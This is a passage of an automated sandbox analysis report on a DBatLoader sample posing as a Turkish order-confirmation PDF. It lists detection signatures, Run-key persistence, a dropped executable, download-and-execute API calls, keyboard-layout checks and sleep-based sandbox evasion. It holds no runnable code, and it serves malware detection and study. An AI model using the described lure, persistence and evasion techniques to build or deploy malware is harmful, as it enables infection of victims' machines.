Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation
barindex
Yara detected DBatLoader
Source: Yara match File source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, type: SAMPLE
Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360030568.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.346405704.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315120211.0000000003610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.306973875.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.326994994.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.316837700.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.349121751.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.309996740.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.317153227.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.312930120.0000000003050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.361029837.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360948526.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.358808877.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.349277729.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360296603.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.259960102.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\Libraries\Eluiezilfw.exe, type: DROPPED
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E5FFF push 090D2120h; retf 0_3_036E60C9
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E5F96 push 090D2120h; retf 0_3_036E60C9
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E5E3E push 090D2120h; retf 0_3_036E60C9
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E580B push ebp; iretd 0_3_036E580C
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E581C push ebp; iretd 0_3_036E581D
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E54D6 push ebp; iretd 0_3_036E5510
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_038D2098 push edx; ret 0_3_038D20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0041BE7A push cs; ret 3_2_0041BE7B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00413ED0 push eax; ret 3_2_00413EFE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0041B326 push cs; ret 3_2_0041B327
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055585F push eax; ret 3_2_1055588D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10541040 push ss; retf 3_2_10541002
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055E44C push es; retf 3_2_1055E460
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00409908
Drops PE files
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File created: C:\Users\Public\Libraries\Eluiezilfw.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040D4E5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00411700
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00409908
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found stalling execution ending in API Sleep call
Source: C:\Windows\SysWOW64\logagent.exe Stalling execution: Execution stalls by calling Sleep
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\logagent.exe Code function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_004113C9
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh 3_2_00405156
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh 3_2_00405156
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 10546B0Ah 3_2_10546AE5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 10546B0Ah 3_2_10546AE5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00404C0A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040751B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ